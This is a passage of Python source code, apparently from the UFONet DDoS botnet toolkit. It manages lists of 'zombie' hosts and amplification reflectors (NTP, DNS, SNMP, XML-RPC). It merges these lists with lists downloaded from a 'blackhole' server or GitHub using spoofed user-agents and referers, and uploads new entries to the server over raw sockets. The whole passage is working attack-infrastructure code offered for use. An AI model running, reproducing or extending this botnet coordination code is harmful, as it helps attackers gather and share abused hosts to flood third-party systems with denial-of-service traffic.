for alien in aliens:
if alien not in troops:
aliens_community.append(alien)
aliens_added = aliens_added + 1
else:
pass
print("[Info] [AI] New [Aliens] found : " + str(aliens_added))
droids = self.extract_droids()
if not droids:
return
droids_community = []
droids_added = 0
f = open('botnet/robots.txt')
robots = f.readlines()
robots = [robot.strip() for robot in robots]
f.close()
fz = open(self.droids_file)
droids = fz.readlines()
droids = [droid.strip() for droid in droids]
fz.close()
for droid in droids:
if droid not in robots:
droids_community.append(droid)
droids_added = droids_added + 1
else:
pass
print("[Info] [AI] New [Droids] found : " + str(droids_added))
ucavs = self.extract_ucavs()
if not ucavs:
return
ucavs_community = []
ucavs_added = 0
f = open('botnet/drones.txt')
drones = f.readlines()
drones = [drone.strip() for drone in drones]
f.close()
fz = open(self.ucavs_file)
ucavs = fz.readlines()
ucavs = [ucav.strip() for ucav in ucavs]
fz.close()
for ucav in ucavs:
if ucav not in drones:
ucavs_community.append(ucav)
ucavs_added = ucavs_added + 1
else:
pass
print("[Info] [AI] New [UCAVs] found : " + str(ucavs_added))
rpcs = self.extract_rpcs()
if not rpcs:
return
rpcs_community = []
rpcs_added = 0
f = open('botnet/reflectors.txt')
reflectors = f.readlines()
reflectors = [reflector.strip() for reflector in reflectors]
f.close()
fz = open(self.rpcs_file)
rpcs = fz.readlines()
rpcs = [rpc.strip() for rpc in rpcs]
fz.close()
for rpc in rpcs:
if rpc not in reflectors:
rpcs_community.append(rpc)
rpcs_added = rpcs_added + 1
else:
pass
print("[Info] [AI] New [X-RPCs] found : " + str(rpcs_added))
ntps = self.extract_ntps()
if not ntps:
return
ntps_community = []
ntps_added = 0
f = open('botnet/crystals.txt')
crystals = f.readlines()
crystals = [crystal.strip() for crystal in crystals]
f.close()
fz = open(self.ntps_file)
ntps = fz.readlines()
ntps = [ntp.strip() for ntp in ntps]
fz.close()
for ntp in ntps:
if ntp not in crystals:
ntps_community.append(ntp)
ntps_added = ntps_added + 1
else:
pass
print("[Info] [AI] New [NTPs] found : " + str(ntps_added))
dnss = self.extract_dnss()
if not dnss:
return
dnss_community = []
dnss_added = 0
f = open('botnet/warps.txt')
warps = f.readlines()
warps = [warp.strip() for warp in warps]
f.close()
fz = open(self.dnss_file)
dnss = fz.readlines()
dnss = [dns.strip() for dns in dnss]
fz.close()
for dns in dnss:
if dns not in warps:
dnss_community.append(dns)
dnss_added = dnss_added + 1
else:
pass
print("[Info] [AI] New [DNSs] found : " + str(dnss_added))
snmps = self.extract_snmps()
if not snmps:
return
snmps_community = []
snmps_added = 0
f = open('botnet/bosons.txt')
bosons = f.readlines()
bosons = [boson.strip() for boson in bosons]
f.close()
fz = open(self.snmps_file)
snmps = fz.readlines()
snmps = [snmp.strip() for snmp in snmps]
fz.close()
for snmp in snmps:
if snmp not in crystals:
snmps_community.append(snmp)
snmps_added = snmps_added + 1
else:
pass
print("[Info] [AI] New [SNMPs] found : " + str(snmps_added))
print('-'*12 + '\n')
if zombies_added == 0 and aliens_added == 0 and droids_added == 0 and ucavs_added == 0 and rpcs_added == 0 and ntps_added == 0 and dnss_added == 0 and snmps_added == 0: # not any zombie
os.remove('botnet/abductions.txt') # remove abductions file
os.remove('botnet/troops.txt') # remove troops file
os.remove('botnet/robots.txt') # remove robots file
os.remove('botnet/drones.txt') # remove ucavs file
os.remove('botnet/reflectors.txt') # remove rpcs file
os.remove('botnet/crystals.txt') # remove crystals file
os.remove('botnet/warps.txt') # remove warps file
os.remove('botnet/bosons.txt') # remove snmps file
print("[Info] [AI] Try to search for new [Zombies]. These are already in this [Blackhole] -> [Exiting!]\n")
return
else:
fc = gzip.open('botnet/community_zombies.txt.gz', 'wb')
for zombie in zombies_community:
fc.write(zombie.strip()+"\n")
fc.close()
os.remove('botnet/abductions.txt') # remove abductions file
fc = gzip.open('botnet/community_aliens.txt.gz', 'wb')
for alien in aliens_community:
fc.write(alien.strip()+"\n")
fc.close()
os.remove('botnet/troops.txt') # remove troops file
fc = gzip.open('botnet/community_droids.txt.gz', 'wb')
for droid in droids_community:
fc.write(droid.strip()+"\n")
fc.close()
os.remove('botnet/robots.txt') # remove robots file
fc = gzip.open('botnet/community_ucavs.txt.gz', 'wb')
for ucav in ucavs_community:
fc.write(ucav.strip()+"\n")
fc.close()
os.remove('botnet/drones.txt') # remove drones file
fc = gzip.open('botnet/community_rpcs.txt.gz', 'wb')
for rpc in rpcs_community:
fc.write(rpc.strip()+"\n")
fc.close()
os.remove('botnet/reflectors.txt') # remove reflectors file
fc = gzip.open('botnet/community_ntps.txt.gz', 'wb')
for ntp in ntps_community:
fc.write(ntp.strip()+"\n")
fc.close()
os.remove('botnet/crystals.txt') # remove crystals file
fc = gzip.open('botnet/community_dnss.txt.gz', 'wb')
for dns in dnss_community:
fc.write(dns.strip()+"\n")
fc.close()
os.remove('botnet/warps.txt') # remove warps file
fc = gzip.open('botnet/community_snmps.txt.gz', 'wb')
for snmp in snmps_community:
fc.write(snmp.strip()+"\n")
fc.close()
os.remove('botnet/bosons.txt') # remove bosons file
print("[Info] [AI] Starting to upload new [Zombies]...\n")
try: # open a socket and send data to the blackhole reciever port
host = self.blackhole
cport = 9991
mport = 9990
try:
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data
cs.connect(host, cport)
cs.send("SEND " + 'community_zombies.txt.gz')
cs.close()
f = open('botnet/community_zombies.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_zombies.txt.gz') # remove local zombies .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cs.connect(host, cport)
cs.send("SEND " + 'community_aliens.txt.gz')
cs.close()
f = open('botnet/community_aliens.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_aliens.txt.gz') # remove local aliens .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cs.connect(host, cport)
cs.send("SEND " + 'community_robots.txt.gz')
cs.close()
f = open('botnet/community_droids.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_droids.txt.gz') # remove local droids .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cs.connect(host, cport)
cs.send("SEND " + 'community_ucavs.txt.gz')
cs.close()
f = open('botnet/community_ucavs.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_ucavs.txt.gz') # remove local ucavs .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
cs.connect(host, cport)
cs.send("SEND " + 'community_rpcs.txt.gz')
cs.close()
f = open('botnet/community_rpcs.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_rpcs.txt.gz') # remove local rpcs .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
cs.connect(host, cport)
cs.send("SEND " + 'community_ntps.txt.gz')
cs.close()
f = open('botnet/community_ntps.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_ntps.txt.gz') # remove local ntps .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
cs.connect(host, cport)
cs.send("SEND " + 'community_dnss.txt.gz')
cs.close()
f = open('botnet/community_dnss.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_dnss.txt.gz') # remove local dnss .gz file after transfer
time.sleep(1)
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # send data one by one recieved by multithreading
cs.connect(host, cport)
cs.send("SEND " + 'community_snmps.txt.gz')
cs.close()
f = open('botnet/community_snmps.txt.gz', "rb")
data = f.read()
f.close()
ms = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ms.connect(host, mport)
ms.send(data)
ms.close()
os.remove('botnet/community_snmps.txt.gz') # remove local snmps .gz file after transfer
time.sleep(2) # sleep a bit more
print('-'*12 + '\n')
print("[Info] [AI] Transfer -> [DONE!]\n")
except Exception as e:
print(str(e) + "\n")
except:
print('-'*12 + '\n')
print("[Error] [AI] Connecting sockets to [Blackhole] -> [Aborting!]\n")
return
except:
print('-'*12 + '\n')
print("[Error] [AI] Unable to upload list of [Zombies] to this [Blackhole] -> [Exiting!]\n")
return
def update_gui_data(self):
# download all GUI stream data
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if self.options.proxy: # set proxy
self.proxy_transport(self.options.proxy)
if self.options.timeout: # set timeout
try:
timeout = int(self.options.timeout)
except:
timeout = 5
else:
timeout = 5
if timeout < 1:
timeout = 5
if self.options.forcessl:
news = urllib.request.Request('https://'+self.blackhole+'/ufonet/news.txt', None, headers)
news_reply = urllib.request.urlopen(news, context=self.ctx, timeout=timeout).read().decode('utf-8')
tv = urllib.request.Request('https://'+self.blackhole+'/ufonet/tv.txt', None, headers)
tv_reply = urllib.request.urlopen(tv, context=self.ctx, timeout=timeout).read().decode('utf-8')
missions = urllib.request.Request('https://'+self.blackhole+'/ufonet/missions.txt', None, headers)
missions_reply = urllib.request.urlopen(missions, context=self.ctx, timeout=timeout).read().decode('utf-8')
board = urllib.request.Request('https://'+self.blackhole+'/ufonet/board.txt', None, headers)
board_reply = urllib.request.urlopen(board, context=self.ctx, timeout=timeout).read().decode('utf-8')
grid = urllib.request.Request('https://'+self.blackhole+'/ufonet/grid.txt', None, headers)
grid_reply = urllib.request.urlopen(grid, context=self.ctx, timeout=timeout).read().decode('utf-8')
wargames = urllib.request.Request('https://'+self.blackhole+'/ufonet/wargames.txt', None, headers)
wargames_reply = urllib.request.urlopen(wargames, context=self.ctx, timeout=timeout).read().decode('utf-8')
links = urllib.request.Request('https://'+self.blackhole+'/ufonet/links.txt', None, headers)
links_reply = urllib.request.urlopen(links, context=self.ctx, timeout=timeout).read().decode('utf-8')
streams = urllib.request.Request('https://'+self.blackhole+'/ufonet/streams.txt', None, headers)
streams_reply = urllib.request.urlopen(streams, context=self.ctx, timeout=timeout).read().decode('utf-8')
globalnet = urllib.request.Request('https://'+self.blackhole+'/ufonet/globalnet.txt', None, headers)
globalnet_reply = urllib.request.urlopen(globalnet, context=self.ctx, timeout=timeout).read().decode('utf-8')
else:
news = urllib.request.Request('http://'+self.blackhole+'/ufonet/news.txt', None, headers)
news_reply = urllib.request.urlopen(news, context=self.ctx).read().decode('utf-8')
tv = urllib.request.Request('http://'+self.blackhole+'/ufonet/tv.txt', None, headers)
tv_reply = urllib.request.urlopen(tv, context=self.ctx).read().decode('utf-8')
missions = urllib.request.Request('http://'+self.blackhole+'/ufonet/missions.txt', None, headers)
missions_reply = urllib.request.urlopen(missions, context=self.ctx).read().decode('utf-8')
board = urllib.request.Request('http://'+self.blackhole+'/ufonet/board.txt', None, headers)
board_reply = urllib.request.urlopen(board, context=self.ctx).read().decode('utf-8')
grid = urllib.request.Request('http://'+self.blackhole+'/ufonet/grid.txt', None, headers)
grid_reply = urllib.request.urlopen(grid, context=self.ctx).read().decode('utf-8')
wargames = urllib.request.Request('http://'+self.blackhole+'/ufonet/wargames.txt', None, headers)
wargames_reply = urllib.request.urlopen(wargames, context=self.ctx).read().decode('utf-8')
links = urllib.request.Request('http://'+self.blackhole+'/ufonet/links.txt', None, headers)
links_reply = urllib.request.urlopen(links, context=self.ctx).read().decode('utf-8')
streams = urllib.request.Request('http://'+self.blackhole+'/ufonet/streams.txt', None, headers)
streams_reply = urllib.request.urlopen(streams, context=self.ctx).read().decode('utf-8')
globalnet = urllib.request.Request('http://'+self.blackhole+'/ufonet/globalnet.txt', None, headers)
globalnet_reply = urllib.request.urlopen(globalnet, context=self.ctx).read().decode('utf-8')
f = open(self.news_file, 'w')
f.write(news_reply)
f.close()
f = open(self.tv_file, 'w')
f.write(tv_reply)
f.close()
f = open(self.missions_file, 'w')
f.write(missions_reply)
f.close()
f = open(self.board_file, 'w')
f.write(board_reply)
f.close()
f = open(self.grid_file, 'w')
f.write(grid_reply)
f.close()
f = open(self.wargames_file, 'w')
f.write(wargames_reply)
f.close()
f = open(self.links_file, 'w')
f.write(links_reply)
f.close()
f = open(self.streams_file, 'w')
f.write(streams_reply)
f.close()
f = open(self.globalnet_file, 'w')
f.write(globalnet_reply)
f.close()
print('-'*25 + "\n")
print("[Info] [AI] GUI data correctly updated:\n")
if news_reply:
print("[Info] [AI] [News] : OK!")
if missions_reply:
print("[Info] [AI] [Missions] : OK!")
if board_reply:
print("[Info] [AI] [Board] : OK!")
if grid_reply:
print("[Info] [AI] [Grid] : OK!")
if wargames_reply:
print("[Info] [AI] [Wargames] : OK!")
if links_reply:
print("[Info] [AI] [Links] : OK!")
if streams_reply:
print("[Info] [AI] [Streams] : OK!")
if tv_reply:
print("[Info] [AI] [TV] : OK!")
if globalnet_reply:
print("[Info] [AI] [GlobalNet]: OK!")
print('-'*25)
print("\n[AI] "+self.exit_msg+"\n")
def downloading_list(self):
# add your mirror to protect/share/distribute... [Zombies]
try:
print(("[AI] Trying [Blackhole] [Server]: "+self.blackhole+"\n"))
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if self.options.timeout: # set timeout
try:
timeout = int(self.options.timeout)
except:
timeout = 5
else:
timeout = 5
if timeout < 1:
timeout = 5
if self.options.proxy: # set proxy
self.proxy_transport(self.options.proxy)
if self.options.forcessl:
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
abductions_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
abductions_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
troops_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
troops_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
robots_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
robots_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
drones_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
drones_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
reflectors_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
reflectors_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/crystals.txt.gz', None, headers)
crystals_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
crystals_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/warps.txt.gz', None, headers)
warps_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
warps_reply = ""
try:
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/bosons.txt.gz', None, headers)
bosons_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
bosons_reply = ""
else:
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
abductions_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
abductions_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
troops_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
troops_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
robots_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
robots_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
drones_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
drones_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
reflectors_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
reflectors_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/crystals.txt.gz', None, headers)
crystals_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
crystals_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/warps.txt.gz', None, headers)
warps_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
warps_reply = ""
try:
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/bosons.txt.gz', None, headers)
bosons_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
except:
bosons_reply = ""
if abductions_reply == "" and troops_reply == "" and robots_reply == "" and drones_reply == "" and reflectors_reply == "" and crystals_reply == "" and warps_reply == "" and bosons_reply == "":
print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX FAILED!]")
print('-'*12 + '\n')
print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [Server] -> [Exiting!]\n")
return
f = open('botnet/abductions.txt.gz', 'wb')
f.write(abductions_reply)
f.close()
f = open('botnet/troops.txt.gz', 'wb')
f.write(troops_reply)
f.close()
f = open('botnet/robots.txt.gz', 'wb')
f.write(robots_reply)
f.close()
f = open('botnet/drones.txt.gz', 'wb')
f.write(drones_reply)
f.close()
f = open('botnet/reflectors.txt.gz', 'wb')
f.write(reflectors_reply)
f.close()
f = open('botnet/crystals.txt.gz', 'wb')
f.write(crystals_reply)
f.close()
f = open('botnet/warps.txt.gz', 'wb')
f.write(warps_reply)
f.close()
f = open('botnet/bosons.txt.gz', 'wb')
f.write(bosons_reply)
f.close()
print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX READY!] ;-)")
except:
print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX FAILED!]")
print('-'*12 + '\n')
print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [Server] -> [Exiting!]\n")
return
print('-'*12 + '\n')
f_in_abductions = gzip.open('botnet/abductions.txt.gz', 'rb')
f_out_abductions = open('botnet/abductions.txt', 'wb')
f_out_abductions.write(f_in_abductions.read())
f_in_abductions.close()
f_out_abductions.close()
os.remove('botnet/abductions.txt.gz') # remove abductions .gz file
f_in_troops = gzip.open('botnet/troops.txt.gz', 'rb')
f_out_troops = open('botnet/troops.txt', 'wb')
f_out_troops.write(f_in_troops.read())
f_in_troops.close()
f_out_troops.close()
os.remove('botnet/troops.txt.gz') # remove troops .gz file
f_in_robots = gzip.open('botnet/robots.txt.gz', 'rb')
f_out_robots = open('botnet/robots.txt', 'wb')
f_out_robots.write(f_in_robots.read())
f_in_robots.close()
f_out_robots.close()
os.remove('botnet/robots.txt.gz') # remove robots .gz file
f_in_drones = gzip.open('botnet/drones.txt.gz', 'rb')
f_out_drones = open('botnet/drones.txt', 'wb')
f_out_drones.write(f_in_drones.read())
f_in_drones.close()
f_out_drones.close()
os.remove('botnet/drones.txt.gz') # remove drones .gz file
f_in_reflectors = gzip.open('botnet/reflectors.txt.gz', 'rb')
f_out_reflectors = open('botnet/reflectors.txt', 'wb')
f_out_reflectors.write(f_in_reflectors.read())
f_in_reflectors.close()
f_out_reflectors.close()
os.remove('botnet/reflectors.txt.gz') # remove reflectors .gz file
f_in_crystals = gzip.open('botnet/crystals.txt.gz', 'rb')
f_out_crystals = open('botnet/crystals.txt', 'wb')
f_out_crystals.write(f_in_crystals.read())
f_in_crystals.close()
f_out_crystals.close()
os.remove('botnet/crystals.txt.gz') # remove crystals .gz file
f_in_warps = gzip.open('botnet/warps.txt.gz', 'rb')
f_out_warps = open('botnet/warps.txt', 'wb')
f_out_warps.write(f_in_warps.read())
f_in_warps.close()
f_out_warps.close()
os.remove('botnet/warps.txt.gz') # remove warps .gz file
f_in_bosons = gzip.open('botnet/bosons.txt.gz', 'rb')
f_out_bosons = open('botnet/bosons.txt', 'wb')
f_out_bosons.write(f_in_bosons.read())
f_in_bosons.close()
f_out_bosons.close()
os.remove('botnet/bosons.txt.gz') # remove bosons .gz file
num_abductions = 0
with open('botnet/abductions.txt') as f:
for _ in f:
num_abductions = num_abductions + 1
print("[Info] Zombies: " + str(num_abductions))
num_robots = 0
with open('botnet/robots.txt') as f:
for _ in f:
num_robots = num_robots + 1
print("[Info] Droids : " + str(num_robots))
num_troops = 0
with open('botnet/troops.txt') as f:
for _ in f:
num_troops = num_troops + 1
print("[Info] Aliens : " + str(num_troops))
num_drones = 0
with open('botnet/drones.txt') as f:
for _ in f:
num_drones = num_drones + 1
print("[Info] UCAVs : " + str(num_drones))
num_reflectors = 0
with open('botnet/reflectors.txt') as f:
for _ in f:
num_reflectors = num_reflectors + 1
print("[Info] X-RPCs : " + str(num_reflectors))
num_crystals = 0
with open('botnet/crystals.txt') as f:
for _ in f:
num_crystals = num_crystals + 1
print("[Info] DNSs : " + str(num_crystals))
num_warps = 0
with open('botnet/warps.txt') as f:
for _ in f:
num_warps = num_warps + 1
print("[Info] NTPs : " + str(num_warps))
num_bosons = 0
with open('botnet/bosons.txt') as f:
for _ in f:
num_bosons = num_bosons + 1
print("[Info] SNMPs : " + str(num_bosons))
total_zombies = num_abductions + num_troops + num_crystals + num_robots + num_drones + num_reflectors + num_warps + num_bosons
print("\n[Info] [AI] Congratulations!. Total downloaded: " + str(total_zombies))
print('-'*12)
if not self.options.forceyes:
update_reply = input("\n[AI] Do you want to merge ONLY the new 'troops' into your army? (Y/n)")
print('-'*25)
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
os.remove('botnet/abductions.txt') # remove abductions file
os.remove('botnet/troops.txt') # remove troops file
os.remove('botnet/robots.txt') # remove robots file
os.remove('botnet/drones.txt') # remove drones file
os.remove('botnet/reflectors.txt') # remove reflectors file
os.remove('botnet/crystals.txt') # remove crystals file
os.remove('botnet/warps.txt') # remove warps file
os.remove('botnet/bosons.txt') # remove bosons file
print("\n[Info] [AI] [Control] Temporal list downloaded has been removed! -> [Exiting!]")
print('-'*25)
print("\n[AI] "+self.exit_msg+"\n")
else:
zombies_ready = []
f = open('botnet/abductions.txt')
abductions = f.readlines()
f.close()
fz = open(self.zombies_file)
zombies = fz.readlines()
fz.close()
for abduction in abductions:
abduction = abduction.replace('\n','')
if abduction not in zombies:
zombies_ready.append(abduction)
else:
pass
self.update_zombies(zombies_ready)
os.remove('botnet/abductions.txt') # remove abductions .txt file
aliens_ready = []
f = open('botnet/troops.txt')
troops = f.readlines()
f.close()
fz = open(self.aliens_file)
aliens = fz.readlines()
fz.close()
for alien in troops:
alien = alien.replace('\n','')
if alien not in aliens:
aliens_ready.append(alien)
else:
pass
self.update_aliens(aliens_ready)
os.remove('botnet/troops.txt') # remove troops .txt file
droids_ready = []
f = open('botnet/robots.txt')
robots = f.readlines()
f.close()
fz = open(self.droids_file)
droids = fz.readlines()
fz.close()
for droid in robots:
droid = droid.replace('\n','')
if droid not in droids:
droids_ready.append(droid)
else:
pass
self.update_droids(droids_ready)
os.remove('botnet/robots.txt') # remove robots .txt file
ucavs_ready = []
f = open('botnet/drones.txt')
drones = f.readlines()
f.close()
fz = open(self.ucavs_file)
ucavs = fz.readlines()
fz.close()
for drone in drones:
drone = drone.replace('\n','')
if drone not in ucavs:
ucavs_ready.append(drone)
else:
pass
self.update_ucavs(ucavs_ready)
os.remove('botnet/drones.txt') # remove drones .txt file
rpcs_ready = []
f = open('botnet/reflectors.txt')
reflectors = f.readlines()
f.close()
fz = open(self.rpcs_file)
rpcs = fz.readlines()
fz.close()
for reflector in reflectors:
reflector = reflector.replace('\n','')
if reflector not in rpcs:
rpcs_ready.append(reflector)
else:
pass
self.update_rpcs(rpcs_ready)
os.remove('botnet/reflectors.txt') # remove reflectors .txt file
dnss_ready = []
f = open('botnet/crystals.txt')
crystals = f.readlines()
f.close()
fz = open(self.dnss_file)
dnss = fz.readlines()
fz.close()
for crystal in crystals:
crystal = crystal.replace('\n','')
if crystal not in dnss:
dnss_ready.append(crystal)
else:
pass
self.update_dnss(dnss_ready)
os.remove('botnet/crystals.txt') # remove crystals .txt file
ntps_ready = []
f = open('botnet/warps.txt')
warps = f.readlines()
f.close()
fz = open(self.ntps_file)
ntps = fz.readlines()
fz.close()
for warp in warps:
warp = warp.replace('\n','')
if warp not in ntps:
ntps_ready.append(warp)
else:
pass
self.update_ntps(ntps_ready)
os.remove('botnet/warps.txt') # remove warps .txt file
snmps_ready = []
f = open('botnet/bosons.txt')
bosons = f.readlines()
f.close()
fz = open(self.snmps_file)
snmps = fz.readlines()
fz.close()
for boson in bosons:
boson = boson.replace('\n','')
if boson not in snmps:
snmps_ready.append(boson)
else:
pass
self.update_snmps(snmps_ready)
os.remove('botnet/bosons.txt') # remove bosons .txt file
print("\n[Info] [AI] Botnet updated! -> ;-)")
self.update_transferred_stats(self.trans_zombies) # update json file with transferred stats (blackhole)
if not self.options.forceyes: # ask for update everything
print('-'*25 + "\n")
update_reply = input("[AI] You would also like to update other content: [News] [Missions] [Grid] [Board]... (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
print("\n[AI] "+self.exit_msg+"\n")
return
else:
try:
update_gui = self.update_gui_data() # update GUI data
except:
print('-'*25 +"\n")
print("[Error] [AI] Something wrong downloading GUI content! -> [Aborting!]")
print('-'*25)
print("\n[AI] "+self.exit_msg+"\n")
return
def downloading_github_list(self):
# add your mirror to protect/share/distribute... [Zombies]
try:
print(("[AI] Trying [Blackhole] [GitHub]: "+self.github_zombies+"\n"))
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if self.options.timeout: # set timeout
try:
timeout = int(self.options.timeout)
except:
timeout = 5
else:
timeout = 5
if timeout < 1:
timeout = 5
if self.options.proxy: # set proxy
self.proxy_transport(self.options.proxy)
try:
req = urllib.request.Request(self.github_zombies+'zombies.txt', None, headers)
zombies_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
zombies_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'aliens.txt', None, headers)
aliens_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
aliens_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'dns.txt', None, headers)
dns_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
dns_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'droids.txt', None, headers)
droids_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
droids_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'rpcs.txt', None, headers)
rpcs_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
rpcs_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'ucavs.txt', None, headers)
ucavs_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
ucavs_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'ntp.txt', None, headers)
ntp_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
ntp_reply = ""
try:
req = urllib.request.Request(self.github_zombies+'snmp.txt', None, headers)
snmp_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
except:
snmp_reply = ""
if zombies_reply == "" and aliens_reply == "" and dns_reply == "" and droids_reply == "" and rpcs_reply == "" and ucavs_reply == "" and ntp_reply == "" and snmp_reply == "":
print("[AI] [Control] [Blackhole] [GitHub] Reply: [VORTEX FAILED!]")
print('-'*12 + '\n')
print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [GitHub] -> [Exiting!]\n")
return
f = open('botnet/abductions.txt', 'w') # zombies
f.write(zombies_reply)
f.close()
f = open('botnet/troops.txt', 'w') # aliens
f.write(aliens_reply)
f.close()
f = open('botnet/crystals.txt', 'w') # dns
f.write(dns_reply)
f.close()
f = open('botnet/robots.txt', 'w') # droids
f.write(droids_reply)
f.close()
f = open('botnet/drones.txt', 'w') # ucavs
f.write(ucavs_reply)
f.close()
f = open('botnet/reflectors.txt', 'w') # rpcs
f.write(rpcs_reply)
f.close()
f = open('botnet/warps.txt', 'w') # ntp
f.write(ntp_reply)
f.close()
f = open('botnet/bosons.txt', 'w') # snmp
f.write(snmp_reply)
f.close()
print("[AI] [Control] [Blackhole] [GitHub] Reply: [VORTEX READY!] ;-)")
except:
print("[AI] [Control] [Blackhole] [GitHub] Reply: [VORTEX FAILED!]")
print('-'*12 + '\n')
print("[Error] [AI] Unable to download list of [Zombies] from this [Blackhole] [GitHub] -> [Exiting!]\n")
return
print('-'*12 + '\n')
num_abductions = 0
with open('botnet/abductions.txt') as f: # zombies
for _ in f:
num_abductions = num_abductions + 1
print("[Info] Zombies: " + str(num_abductions))
num_troops = 0
with open('botnet/troops.txt') as f: # aliens
for _ in f:
num_troops = num_troops + 1
print("[Info] Aliens : " + str(num_troops))
